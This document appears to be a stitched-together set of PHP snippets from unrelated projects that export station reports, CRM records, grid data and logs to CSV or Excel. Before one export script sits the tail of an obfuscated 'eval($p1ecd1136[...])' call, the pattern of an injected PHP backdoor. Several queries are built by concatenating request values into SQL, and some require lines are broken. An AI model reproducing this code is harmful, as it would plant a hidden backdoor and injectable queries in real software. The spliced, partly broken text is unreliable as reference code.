public function getStationReport($GET) { $infoType = $GET['infoTypeRadio']; $periodType = $GET['periodTypeRadio']; $folSeq = $GET['stationsSelect']; $fromDateStr = $GET['fromDate']; $toDateStr = $GET['toDate']; $timeBase = $GET['timeBase']; $channelNoArray = $GET['channelNos']; if ($channelNoArray == null) { return null; } if ($periodType != "recent" && false === strtotime($fromDateStr)) { return null; } if ($periodType == "period" && (false === strtotime($fromDateStr) || false === strtotime($toDateStr))) { return null; } $datesArr = self::getFromToDates($periodType, $fromDateStr, $toDateStr); if ($infoType == "grid") { $gridDataJson = self::getGridData($datesArr['fromDate'], $datesArr['toDate'], $folSeq, $timeBase, $channelNoArray, $periodType); return $gridDataJson; } elseif ($infoType == "graph") { $graphDataJson = self::getGridData($datesArr['fromDate'], $datesArr['toDate'], $folSeq, $timeBase, $channelNoArray, $periodType); $graphChannelsJSON = array(); $graphDataJSON = array(); foreach ($graphDataJson['channels'] as $key => $value) { array_push($graphChannelsJSON, $key); $graphDataJSON[$key] = array(); } $graphDatesJSON = array(); foreach ($graphDataJson['data'] as $data) { array_push($graphDatesJSON, $data['dated']); foreach ($data['values'] as $key1 => $val1) { array_push($graphDataJSON[$graphChannelsJSON[$key1]], (double) $val1); } } $finalJSON = new ArrayObject(); $finalJSON['dates'] = $graphDatesJSON; $finalJSON['values'] = $graphDataJSON; return $finalJSON; } elseif ($infoType == "export") { $gridDataJson = self::getGridData($datesArr['fromDate'], $datesArr['toDate'], $folSeq, $timeBase, $channelNoArray, $periodType); $FDS = FolderDataStore::getInstance(); $folder = $FDS->FindBySeq($folSeq); ExportUtils::exportStationGridReport($gridDataJson, $folder->getFolderName()); return null; } }
public function export_action() { if (isset($_POST['exportDatas'])) { $pager['exportDatas'] = json_decode($_POST['exportDatas'], true); $pager['exportFileName'] = $_POST['exportFileName']; $pager['isExport'] = true; $pager['exportType'] = 'excel'; $pager['exportDataIsProcessed'] = true; foreach (array_keys($pager['exportDatas'][0]) as $k => $v) { $pager['exportColumns'][$k]['id'] = $v; $pager['exportColumns'][$k]['title'] = $v; } //print_r($pager);exit; ExportUtils::export($pager); //ExportUtils::exportExcel($pager, $pager['exportDatas'], "\"".$pager['exportFileName']."\""); return; } }
/** * This function exports all the data for a given module * Param $type - module name * Return type text */ function export($type) { global $log, $list_max_entries_per_page; $log->debug("Entering export(" . $type . ") method ..."); global $adb; $focus = 0; $content = ''; if ($type != "") { // vtlib customization: Hook to dynamically include required module file. // Refer to the logic in setting $currentModule in index.php $focus = CRMEntity::getInstance($type); } $log = LoggerManager::getLogger('export_' . $type); $db = PearDatabase::getInstance(); $oCustomView = new CustomView("{$type}"); $viewid = $oCustomView->getViewId("{$type}"); $sorder = $focus->getSortOrder(); $order_by = $focus->getOrderBy(); $search_type = $_REQUEST['search_type']; $export_data = $_REQUEST['export_data']; if (isset($_SESSION['export_where']) && $_SESSION['export_where'] != '' && $search_type == 'includesearch') { $where = $_SESSION['export_where']; } $query = $focus->create_export_query($where); if ($search_type != 'includesearch' && $type != 'Calendar') { $stdfiltersql = $oCustomView->getCVStdFilterSQL($viewid); $advfiltersql = $oCustomView->getCVAdvFilterSQL($viewid); if (isset($stdfiltersql) && $stdfiltersql != '') { $query .= ' and ' . $stdfiltersql; } if (isset($advfiltersql) && $advfiltersql != '') { $query .= ' and ' . $advfiltersql; } } $params = array(); if (($search_type == 'withoutsearch' || $search_type == 'includesearch') && $export_data == 'selecteddata') { $idstring = explode(";", $_REQUEST['idstring']); if ($type == 'Accounts' && count($idstring) > 0) { $query .= ' and vtiger_account.accountid in (' . generateQuestionMarks($idstring) . ')'; array_push($params, $idstring); } elseif ($type == 'Contacts' && count($idstring) > 0) { $query .= ' and vtiger_contactdetails.contactid in (' . generateQuestionMarks($idstring) . ')'; array_push($params, $idstring); } elseif ($type == 'Potentials' && count($idstring) > 0) { $query .= ' and vtiger_potential.potentialid in (' . generateQuestionMarks($idstring) . ')'; array_push($params, $idstring); } elseif ($type == 'Leads' && count($idstring) > 0) { $query .= ' and vtiger_leaddetails.leadid in (' . generateQuestionMarks($idstring) . ')'; array_push($params, $idstring); } elseif ($type == 'Products' && count($idstring) > 0) { $query .= ' and vtiger_products.productid in (' . generateQuestionMarks($idstring) . ')'; array_push($params, $idstring); } elseif ($type == 'Documents' && count($idstring) > 0) { $query .= ' and vtiger_notes.notesid in (' . generateQuestionMarks($idstring) . ')'; array_push($params, $idstring); } elseif ($type == 'HelpDesk' && count($idstring) > 0) { $query .= ' and vtiger_troubletickets.ticketid in (' . generateQuestionMarks($idstring) . ')'; array_push($params, $idstring); } elseif ($type == 'Vendors' && count($idstring) > 0) { $query .= ' and vtiger_vendor.vendorid in (' . generateQuestionMarks($idstring) . ')'; array_push($params, $idstring); } else { if (count($idstring) > 0) { // vtlib customization: Hook to make the export feature available for custom modules. $query .= " and {$focus->table_name}.{$focus->table_index} in (" . generateQuestionMarks($idstring) . ')'; array_push($params, $idstring); // END } } } if (isset($order_by) && $order_by != '') { if ($order_by == 'smownerid') { $query .= ' ORDER BY user_name ' . $sorder; } elseif ($order_by == 'lastname' && $type == 'Documents') { $query .= ' ORDER BY vtiger_contactdetails.lastname ' . $sorder; } elseif ($order_by == 'crmid' && $type == 'HelpDesk') { $query .= ' ORDER BY vtiger_troubletickets.ticketid ' . $sorder; } else { $tablename = getTableNameForField($type, $order_by); $tablename = $tablename != '' ? $tablename . "." : ''; if ($adb->dbType == "pgsql") { $query .= ' GROUP BY ' . $tablename . $order_by; } $query .= ' ORDER BY ' . $tablename . $order_by . ' ' . $sorder; } } if ($export_data == 'currentpage') { $current_page = ListViewSession::getCurrentPage($type, $viewid); $limit_start_rec = ($current_page - 1) * $list_max_entries_per_page; if ($limit_start_rec < 0) { $limit_start_rec = 0; } $query .= ' LIMIT ' . $limit_start_rec . ',' . $list_max_entries_per_page; } $result = $adb->pquery($query, $params, true, "Error exporting {$type}: " . "<BR>{$query}"); $fields_array = $adb->getFieldsArray($result); $fields_array = array_diff($fields_array, array("user_name")); $__processor = new ExportUtils($type, $fields_array); // Translated the field names based on the language used. $translated_fields_array = array(); for ($i = 0; $i < count($fields_array); $i++) { $translated_fields_array[$i] = getTranslatedString($fields_array[$i], $type); } $header = implode("\",\"", array_values($translated_fields_array)); $header = "\"" . $header; $header .= "\"\r\n"; /** Output header information */ echo $header; $column_list = implode(",", array_values($fields_array)); while ($val = $adb->fetchByAssoc($result, -1, false)) { $new_arr = array(); $val = $__processor->sanitizeValues($val); foreach ($val as $key => $value) { if ($type == 'Documents' && $key == 'description') { $value = strip_tags($value); $value = str_replace(' ', '', $value); array_push($new_arr, $value); } elseif ($key != "user_name") { // Let us provide the module to transform the value before we save it to CSV file $value = $focus->transform_export_value($key, $value); array_push($new_arr, preg_replace("/\"/", "\"\"", $value)); } } $line = implode("\",\"", $new_arr); $line = "\"" . $line; $line .= "\"\r\n"; /** Output each row information */ echo $line; } $log->debug("Exiting export method ..."); return true; }
public function getMultiStationReport($GET) { $infoType = $GET['infoTypeRadio']; $exportType = $GET['exportTypeRadio']; $valueType = $GET['valueTypeRadio']; $folSeq = $GET['stationsSelect']; $fromDateStr = $GET['fromDate']; $toDateStr = $GET['toDate']; $timeBase = $GET['timeBase']; $timeBaseQuick = $GET['timeBaseQuick']; $quickReportType = $GET['quickReportType']; if ($quickReportType != "null") { $timeBase = $timeBaseQuick; } if ($valueType != "normal") { $timeBase = "5min"; } $isValidated = $GET['isValidated']; $isAverage = $GET['isAverage']; $folSeqArray = array(); //holds all folderseqs $folChannelsArray = array(); //holds selected channels by foldSeq as key foreach ($GET as $key => $value) { if (strpos($key, "channelNos_") !== false) { $folSeq = (double) substr($key, 11); array_push($folSeqArray, $folSeq); $folChannelsArray[$folSeq] = $value; } } //a few validation checks if (count($folChannelsArray) == 0) { return null; } if ($quickReportType == "null" && (false === strtotime($fromDateStr) || false === strtotime($toDateStr))) { return null; } //get folderNames from DB $FDS = FolderDataStore::getInstance(); $foldersObjArray = $FDS->FindBySeqs($folSeqArray); //calculating from to dates from provided $_GET $fromToDates = DateUtils::getDatesArrayForStationReports($quickReportType, $fromDateStr, $toDateStr); //calculating Date Slices now from DateUtils $fromDate = new DateTime($fromToDates['fromDate']); $toDate = new DateTime($fromToDates['toDate']); $folChannelsNamesArray = array(); //holds selected channels by foldSeq as key $allChannelsArray = array(); $channelUnitArray = array(); foreach ($folChannelsArray as $folSeq => $folChannelChannelsArr) { $folName = $foldersObjArray[$folSeq]->getFolderName(); $CCDS = ChannelConfigurationDataStore::getInstance(); $ChannelsInfo = $CCDS->FindByFolderAndChannelNos($folSeq, $folChannelChannelsArr); $channelNamesArr = array(); foreach ($ChannelsInfo as $chInfo) { if ($valueType != "normal") { if (!self::isZeroSpanChannel($chInfo->getChannelName())) { $chNo = $chInfo->getChannelNumber(); $chArr = $folChannelsArray[$folSeq]; if (($key = array_search($chNo, $chArr)) !== false) { unset($folChannelsArray[$folSeq][$key]); $folChannelsArray[$folSeq] = array_values($folChannelsArray[$folSeq]); } continue; } } $chUnit = $chInfo->getChannelUnit(); if (ConvertorUtils::getPrescribedUnit($chInfo->getChannelName()) != null) { $chUnit = ConvertorUtils::getPrescribedUnit($chInfo->getChannelName()); } $chUnit = mb_check_encoding($chUnit, 'UTF-8') ? $chUnit : utf8_encode($chUnit); $chStation = $chInfo->getChannelStation(); if (!empty($chStation)) { $chStation = " - " . $chStation; } $chStr = $folName . '<br>' . $chInfo->getChannelName() . $chStation . '<br>' . $chUnit; array_push($allChannelsArray, $chStr); array_push($channelUnitArray, $chUnit); array_push($channelNamesArr, $chInfo->getChannelName()); } $folChannelsNamesArray[$folSeq] = $channelNamesArr; } //Created an array with folSeq and seelcted channels for it $folChannelDataArray = array(); foreach ($folSeqArray as $folSeq) { $channelNoArray = $folChannelsArray[$folSeq]; $EDS = ExemptionDataStore::getInstance(); $exemptions = $EDS->FindExemptionsByFolderDatesChannels($folSeq, $fromToDates['fromDate'], $fromToDates['toDate'], implode(', ', $channelNoArray)); //Stack or AQMS $stationType = $foldersObjArray[$folSeq]->getStationType(); $dataJson = self::getDataJSON($fromToDates['fromDate'], $fromToDates['toDate'], $folSeq, "5min", $channelNoArray, $periodType, $exemptions, $stationType); //$avgData = self::getAverageData($fromToDates['fromDate'],$fromToDates['toDate'],$folSeq,$channelNoArray); $folChannelDataArray[$folSeq] = $dataJson['data']; } //Created an array with folSeq -> date->chanelvalues $CMD = CommentsDataStore::getInstance(); $commentsObjs = $CMD->FindCommentsMasterByFolChannel($folSeqArray[0], $folChannelsArray[$folSeqArray[0]]); $dataSlices = null; //if its stack type we are supporting single station/folder data only $stationType = $foldersObjArray[$folSeqArray[0]]->getStationType(); if ($stationType == 'stack' || $stationType == 'effluent') { //if($isAverage == "on"){ //$dateSlices = DateUtils::getDateSlicesByInterval($fromDate,$toDate,$timeBase); //}else{ if ($timeBase == "instant") { $dateSlices = DateUtils::getDateSlicesForData($folChannelDataArray[$folSeqArray[0]], $isAverage, $timeBase); } else { $dateSlices = DateUtils::getDateSlicesByInterval($fromDate, $toDate, $timeBase); } //} } else { $dateSlices = DateUtils::getDateSlicesByInterval($fromDate, $toDate, $timeBase); } //$dateSlices = $dateSlicesValid; $dataFinal = self::getFinalDataByValueType($timeBase, $dateSlices, $folSeqArray, $folChannelDataArray, $folChannelsNamesArray, $valueType, $isAverage, $stationType); if ($isValidated == "on") { $dateSlicesValidByChannelNumber = DateUtils::getDateSlicesByComments($commentsObjs, $timeBase, $folChannelsArray[$folSeqArray[0]]); $dataFinal = self::getValidatedDataOnly($dataFinal, $dateSlicesValidByChannelNumber); } if ($valueType != "normal") { $dataFinal = self::getZeroSpanValues($dataFinal); } $channelDataJSON = array(); $channelDataJSON['channels'] = $allChannelsArray; //all channels with key as chno and val as chname $channelDataJSON['data'] = $dataFinal; //dateFinal is date as key and array of channel values as value $finalDataJSON = self::processDataJsonForGridGraph($channelDataJSON, $infoType); $finalDataJSON["units"] = $channelUnitArray; if ($infoType == "export") { ExportUtils::exportMultiStationGridReport($finalDataJSON, $exportType); return null; } else { if (count($channelDataJSON['channels']) == 1) { $chName = $channelNamesArr[0]; $presLimit = PrescribedLimitsUtils::getPrescribedLimit($chName); if ($presLimit != null) { $finalDataJSON['presLimit'] = $presLimit; } } return self::getAvgMinMaxValues($finalDataJSON); } }
/** * DTGrid的查询方法 * @param sql 查询SQL * @param pager 传递的Pager参数对象 * @return 包含查询结果集的Pager * @throws Exception */ static function queryForDTGrid($sql, $pager, $db_config) { try { if (is_resource($db_config)) { $link = $db_config; } else { $link = mysql_connect($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass']); mysql_select_db($db_config['dbname'], $link); } // 处理导出 if ($pager["isExport"]) { // 如果是全部导出数据 if ($pager["exportAllData"]) { // 获取快速查询条件SQL、高级查询条件SQL $fastQuerySql = QueryUtils::getFastQuerySql($pager["fastQueryParameters"]); $advanceQueryConditionSql = QueryUtils::getAdvanceQueryConditionSql($pager["advanceQueryConditions"]); // 获取排序SQL $advanceQuerySortSql = QueryUtils::getAdvanceQuerySortSql($pager["advanceQuerySorts"]); // 查询结果集放到信息中 $resultSql = "select * from (" . $sql . ") t where 1=1 " . $fastQuerySql . $advanceQueryConditionSql . $advanceQuerySortSql; $result = mysql_query($resultSql, $link); $exportDatas = array(); while ($row = mysql_fetch_array($result)) { array_push($exportDatas, $row); } $pager["exportDatas"] = $exportDatas; } ExportUtils::export($pager); return; } // 映射为int型 $pageSize = $pager["pageSize"]; $startRecord = $pager["startRecord"]; $recordCount = $pager["recordCount"]; $pageCount = $pager["pageCount"]; // 获取快速查询条件SQL、高级查询条件SQL $fastQuerySql = QueryUtils::getFastQuerySql($pager["fastQueryParameters"]); $advanceQueryConditionSql = QueryUtils::getAdvanceQueryConditionSql($pager["advanceQueryConditions"]); // 获取排序SQL $advanceQuerySortSql = QueryUtils::getAdvanceQuerySortSql($pager["advanceQuerySorts"]); // 获取总记录条数、总页数可能没有 $countSql = "select count(*) from (" . $sql . ") t where 1=1 " . $fastQuerySql . $advanceQueryConditionSql . $advanceQuerySortSql; $result = mysql_query($countSql, $link); $recordCount = 0; while ($row = mysql_fetch_row($result)) { $recordCount = $row[0]; } $pager["recordCount"] = $recordCount; $pageCount = ceil($recordCount / $pageSize); $pager["pageCount"] = $pageCount; // 查询结果集放到信息中 $resultSql = ""; $resultSql .= "select * from (" . $sql . ") t where 1=1 " . $fastQuerySql . $advanceQueryConditionSql . $advanceQuerySortSql . " limit " . $startRecord . ", " . $pageSize; $result = mysql_query($resultSql, $link); $dataList = array(); while ($row = mysql_fetch_array($result)) { array_push($dataList, $row); } $pager["exhibitDatas"] = $dataList; // 设置查询成功 $pager["isSuccess"] = true; } catch (Exception $e) { // 设置查询失败 $pager["isSuccess"] = false; } echo json_encode($pager); }
/** * DTGrid的查询方法 * @param sql 查询SQL * @param pager 传递的Pager参数对象 * @return 包含查询结果集的Pager * @throws Exception */ static function queryForDTGrid($sql, $pager, $db_config, &$args) { if (!$args) { $args = array(); } try { $mysqli = new mysqli($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname']); mysqli_query($mysqli, "SET NAMES utf8"); // 检查连接是否被创建 if (mysqli_connect_errno()) { printf("Connect failed: %s\n", mysqli_connect_error()); exit; } // 处理导出 if ($pager["isExport"]) { // 如果是全部导出数据 if ($pager["exportAllData"]) { // 获取快速查询条件SQL、高级查询条件SQL $fastQuerySql = QueryUtils::getFastQuerySql($pager["fastQueryParameters"], $args); $advanceQueryConditionSql = QueryUtils::getAdvanceQueryConditionSql($pager["advanceQueryConditions"], $args); // 获取排序SQL $advanceQuerySortSql = QueryUtils::getAdvanceQuerySortSql($pager["advanceQuerySorts"]); // 查询结果集放到信息中 $resultSql = "select * from (" . $sql . ") t where 1=1 " . $fastQuerySql . $advanceQueryConditionSql . $advanceQuerySortSql; if ($stmt = $mysqli->prepare($resultSql)) { $types = ""; foreach ($args as $arg) { if (is_numeric($arg)) { $types .= "i"; } else { $types .= "s"; } } $execute_args = $args; array_splice($execute_args, 0, 0, $types); if (count($args) != 0) { call_user_func_array(array($stmt, "bind_param"), ParamsUtils::refValues($execute_args)); } $stmt->execute(); $result = array(); $stmt->bind_result($result); $exportDatas = array(); while ($row = mysql_fetch_array($result)) { array_push($exportDatas, $row); } $pager["exportDatas"] = $exportDatas; $stmt->close(); } } ExportUtils::export($pager); return; } // 映射为int型 $pageSize = $pager["pageSize"]; $startRecord = $pager["startRecord"]; $recordCount = $pager["recordCount"]; $pageCount = $pager["pageCount"]; // 获取快速查询条件SQL、高级查询条件SQL $fastQuerySql = QueryUtils::getFastQuerySql($pager["fastQueryParameters"], $args); $advanceQueryConditionSql = QueryUtils::getAdvanceQueryConditionSql($pager["advanceQueryConditions"], $args); // 获取排序SQL $advanceQuerySortSql = QueryUtils::getAdvanceQuerySortSql($pager["advanceQuerySorts"]); // 获取总记录条数、总页数可能没有 $countSql = "select count(*) from (" . $sql . ") t where 1=1 " . $fastQuerySql . $advanceQueryConditionSql . $advanceQuerySortSql; $recordCount = 0; if ($stmt = $mysqli->prepare($countSql)) { $types = ""; foreach ($args as $arg) { if (is_numeric($arg)) { $types .= "i"; } else { $types .= "s"; } } $execute_args = $args; array_splice($execute_args, 0, 0, $types); if (count($args) != 0) { call_user_func_array(array($stmt, "bind_param"), ParamsUtils::refValues($execute_args)); } $stmt->execute(); $stmt->bind_result($result); while ($stmt->fetch()) { $recordCount = $result; } $stmt->close(); } $pager["recordCount"] = $recordCount; $pageCount = $recordCount / $pageSize + ($recordCount % $pageSize > 0 ? 1 : 0); $pager["pageCount"] = $pageCount; // 查询结果集放到信息中 $resultSql = ""; $resultSql .= "select * from (" . $sql . ") t where 1=1 " . $fastQuerySql . $advanceQueryConditionSql . $advanceQuerySortSql . " limit ?, ?"; array_push($args, $startRecord); array_push($args, $pageSize); $dataList = array(); if ($stmt = $mysqli->prepare($resultSql)) { $types = ""; foreach ($args as $arg) { if (is_numeric($arg)) { $types .= "i"; } else { $types .= "s"; } } $execute_args = $args; array_splice($execute_args, 0, 0, $types); if (count($args) != 0) { call_user_func_array(array($stmt, "bind_param"), ParamsUtils::refValues($execute_args)); } $stmt->execute(); $dataList = DtGridUtils::fetch($stmt); $stmt->close(); } $pager["exhibitDatas"] = $dataList; // 设置查询成功 $pager["isSuccess"] = true; } catch (Exception $e) { // 设置查询失败 $pager["isSuccess"] = false; } echo json_encode($pager); }
$logs = $HVRRDS->getHighValueReminderLogs($folderSeq, $fromDateStr, $toDateStr); $logs = json_encode($logs); } $folDDown = DropDownUtils::getFoldersDropDownWithStationName($folders, "folder", "", $folderSeq); if (isset($_POST["call"]) && $_POST["call"] == "exportLogs") { $folderSeq = $_POST["folderSeq"]; $fromDateForm = $_POST["fromDate"]; $toDateForm = $_POST["toDate"]; $fromDate = new DateTime($fromDateForm); $toDate = new DateTime($toDateForm); $toDate = $toDate->add(new DateInterval('P1D')); $fromDateStr = $fromDate->format("Y/m/d H:i:s"); $toDateStr = $toDate->format("Y/m/d H:i:s"); $HVRRDS = HighValueRuleReminderDataStore::getInstance(); $logs = $HVRRDS->getHighValueReminderLogs($folderSeq, $fromDateStr, $toDateStr); ExportUtils::ExportData($logs); } ?> <!DOCTYPE html> <html> <head> <?php include "_jsAdminInclude.php"; ?> <?php include "../_InspiniaInclude.php"; ?> </head> <body> <div id="wrapper">
eval($p1ecd1136[$z3b40['p2e1ecd'][35]]); } exit; } require_once ''; require_once $ConstantsArray['dbServerUrl'] . "/Utils/ExportUtils.php"; require_once $ConstantsArray['dbServerUrl'] . "/DataStoreMgr/WQDFileDataStore.php"; require_once $ConstantsArray['dbServerUrl'] . "/DataStoreMgr/FolderDataStore.php"; require_once $ConstantsArray['dbServerUrl'] . "/DataStoreMgr/ChannelConfigurationDataStore.php"; $action = $_GET['action']; $fullArray = array(); if ($action == "exportCSV") { $fromDate = new DateTime($_GET['fromDate']); $toDate = new DateTime($_GET['toDate']); $channelNumbers = $_GET['channels']; //here comma separated folder seqs will come //add sheets for each selected one $folSeq = $_GET['folSeq']; $isPLimits = $_GET['isPLimits']; $CCDS = ChannelConfigurationDataStore::getInstance(); $ChannelsInfo = $CCDS->FindByFolder($folSeq); $toDate->setTime(23, 59, 59); $fromDate = $fromDate->format("Y/m/d H:i:s"); $toDate = $toDate->format("Y/m/d H:i:s"); $interval = $_GET['interval']; $WQDS = WQDDataDataStore::getInstance(); $arr = $WQDS->getExportData($fromDate, $toDate, $folSeq, $channelNumbers, $interval); $FDS = FolderDataStore::getInstance(); $folder = $FDS->FindBySeq($folSeq); ExportUtils::exportCSV($arr, $channelNumbers, $folder->getFolderName(), $isPLimits, $ChannelsInfo); }
<?php require_once ''; require_once $ConstantsArray['dbServerUrl'] . "DataStoreMgr//AppLogDataStore.php"; require_once $ConstantsArray['dbServerUrl'] . "Utils//ExportUtils.php"; $logDataStore = AppLogDataStore::getInstance(); if ($_GET["call"] == "getAllLogs") { $logsJson = $logDataStore->getAllLogsJson(); echo $logsJson; return; } if ($_POST["call"] == "exportLogs") { $logsJson = $logDataStore->getAllLogs(); ExportUtils::ExportData($logsJson); } ?> <html> <head> <?php include "_jsAdminInclude.php"; ?> </head> <?php include "leftButtons.php"; ?> <Div class="rightAdminPanel"> <?php include "logOutButton.php"; ?> <form name="exportLogsForm" id="exportLogsForm" method="post" action="showLogs.php" > <input type="hidden" name= "call" value="exportLogs" >
<?php require "../config/"; require "../utils/DtGridUtils.class.php"; require "../utils/ExportUtils.class.php"; require "../utils/QueryUtils.class.php"; require "../lib/pdf/fpdf.php"; require "../lib/pdf/chinese.php"; require "../lib/excel/PHPExcel.php"; require '../lib/excel/PHPExcel/IOFactory.php'; require '../lib/excel/PHPExcel/Writer/Excel5.php'; $dtGridPager = $_POST["dtGridPager"]; $pager = json_decode($dtGridPager, true); ExportUtils::export($pager);
/** * 导出Excel * @param request 请求对象 * @param response 响应对象 * @param pager dtGrid对象 * @param exportDatas 导出的数据 * @param fileName 文件名 * @throws Exception */ static function exportExcel($pager, $exportDatas, $fileName) { // 设置响应头 header("Content-Type: application/"); header("Content-Disposition: attachment; filename=\"" . $fileName . ".xls\""); header("Pragma: no-cache"); header("Expires: 0"); // 创建Excel对象 $resultPHPExcel = new PHPExcel(); // 设置当前Sheet名称 $resultPHPExcel->setActiveSheetIndex(0); $resultPHPExcel->getActiveSheet()->setTitle($fileName); // 定义边框样式 $borderStyleArray = array('borders' => array('allborders' => array('style' => PHPExcel_Style_Border::BORDER_THIN, 'color' => array('argb' => 'FF333333')))); // 定义最大宽度 $widths = array(); // 判断一下表头数组是否有数据 if ($pager["exportColumns"] != null && count($pager["exportColumns"]) > 0) { // 循环写入表头 $i = 0; $j = 1; foreach ($pager["exportColumns"] as $column) { $resultPHPExcel->getActiveSheet()->setCellValue(ExportUtils::intToChr($i) . $j, $column["title"]); array_push($widths, strlen($column["title"])); $i++; } $j++; // 设置表头样式 $headerStyle = $resultPHPExcel->getActiveSheet()->getStyle("A1:" . ExportUtils::intToChr(count($pager["exportColumns"]) - 1) . "1"); $headerStyle->getFont()->setName("微软雅黑"); $headerStyle->getFont()->setSize(9); $headerStyle->getFont()->setBold(true); $headerStyle->getFont()->getColor()->setARGB('FFFFFFFF'); $headerStyle->getAlignment()->setHorizontal(PHPExcel_Style_Alignment::HORIZONTAL_CENTER); $headerStyle->getAlignment()->setVertical(PHPExcel_Style_Alignment::VERTICAL_CENTER); $headerStyle->getFill()->setFillType(PHPExcel_Style_Fill::FILL_SOLID); $headerStyle->getFill()->getStartColor()->setARGB('FF1B9ECE'); $headerStyle->applyFromArray($borderStyleArray); // 判断表中是否有数据 if ($exportDatas != null && count($exportDatas) > 0) { // 循环写入表中数据 foreach ($exportDatas as $record) { $i = 0; foreach ($pager["exportColumns"] as $column) { $content = $record[$column["id"]]; // 如果内容未被处理则进行格式化 if (!$pager["exportDataIsProcessed"]) { $content = DtGridUtils::formatContent($column, $content); } $resultPHPExcel->getActiveSheet()->setCellValue(ExportUtils::intToChr($i) . $j, $content); if ($widths[$i] < strlen($content)) { $widths[$i] = strlen($content); } $i++; } $j++; } // 设置内容样式 $contentStyle = $resultPHPExcel->getActiveSheet()->getStyle("A2:" . ExportUtils::intToChr(count($pager["exportColumns"]) - 1) . (count($exportDatas) + 1)); $contentStyle->getFont()->setName("微软雅黑"); $contentStyle->getFont()->setSize(9); $contentStyle->getFont()->getColor()->setARGB('FF333333'); $contentStyle->getAlignment()->setHorizontal(PHPExcel_Style_Alignment::HORIZONTAL_CENTER); $contentStyle->getAlignment()->setVertical(PHPExcel_Style_Alignment::VERTICAL_CENTER); $contentStyle->applyFromArray($borderStyleArray); } // 冻结首行 $resultPHPExcel->getActiveSheet()->freezePane("A2"); // 自适应宽度 $i = 0; foreach ($pager["exportColumns"] as $column) { $resultPHPExcel->getActiveSheet()->getColumnDimension(ExportUtils::intToChr($i))->setWidth($widths[$i]); $i++; } } // 输出 $xlsWriter = new PHPExcel_Writer_Excel5($resultPHPExcel); $xlsWriter->save("php://output"); }